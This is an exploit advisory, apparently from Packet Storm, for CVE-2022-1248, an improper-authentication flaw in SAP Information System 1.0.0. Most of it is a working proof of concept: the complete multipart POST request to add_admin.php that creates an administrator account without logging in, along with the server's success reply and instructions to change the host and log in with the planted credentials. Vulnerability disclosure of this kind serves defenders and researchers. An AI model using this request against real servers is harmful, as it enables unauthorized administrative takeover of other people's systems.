SAP Information System version 1.0.0 suffers from an improper authentication vulnerability that allows a malicious user to create an administrative account without needing to authenticate. The POST request is sent to the /SAP_Information_System/controllers/add_admin.php endpoint. The problem occurs due to lack of session verification in the request.
81b2d35c550ef4f8db3fd0aac42c15232a707b20d75b5eeabeefd52e176de1e6# Exploit Title: SAP Information System 1.0.0 - Improper Authentication
# Date: 06/04/2022
# CVE: CVE-2022-1248
# Exploit Author: Mr Empy
# Software Link:
https://www.sourcecodester.com/php/15262/sap-information-system-using-phppdo-oop.html
# Version: 1.0.0
# Tested on: Linux
Title:
================
SAP Information System 1.0.0 - Improper Authentication
Summary:
================
SAP Information System version 1.0.0 suffers from an improper
authentication vulnerability that allows a malicious user to create an
administrative account without needing to authenticate. The POST request is
sent to the /SAP_Information_System/controllers/add_admin.php endpoint. The
problem occurs due to lack of session verification in the request.
Severity Level:
================
7.3 (High)
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
Affected Product:
================
SAP Information System version v1.0.0
Steps to Reproduce:
================
Steps to Reproduce:
1. Copy this request and change the host and send it to the server:
############################################
POST /SAP_Information_System/controllers/add_admin.php HTTP/1.1
Host: target.com
Content-Length: 345
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/95.0.4638.69 Safari/537.36
Content-Type: multipart/form-data;
boundary=----WebKitFormBoundaryYELEK8fMdX63l0iI
Origin: http://target.com
Referer: http://target.com/SAP_Information_System/Dashboard/pages/Admin.php
Accept-Encoding: gzip, deflate
Accept-Language: pt-PT,pt;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=jjnkf4nmpdm7sca82btt2r4s1c
Connection: close
------WebKitFormBoundaryYELEK8fMdX63l0iI
Content-Disposition: form-data; name="username"
hacker
------WebKitFormBoundaryYELEK8fMdX63l0iI
Content-Disposition: form-data; name="password"
P@ssw0rd!
------WebKitFormBoundaryYELEK8fMdX63l0iI
Content-Disposition: form-data; name="user"
admin
------WebKitFormBoundaryYELEK8fMdX63l0iI--
############################################
Reply:
############################################
HTTP/1.1 200 OK
Date: Tue, 05 Apr 2022 16:15:46 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 267
Connection: close
Content-Type: text/html; charset=UTF-8
<script type="text/javascript">setTimeout(function () { swal("Add Admin
Successfully!","Message!","success");}, 1000);</script><script
type="text/javascript">setTimeout(function(){window.location =
"/SAP_Information_System/Dashboard/pages/Admin.php"},1000)</script>
############################################
2. Go to the login page and enter the hacker:P@ssw0rd! credential. After
that you will be logged in with an administrative account.
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed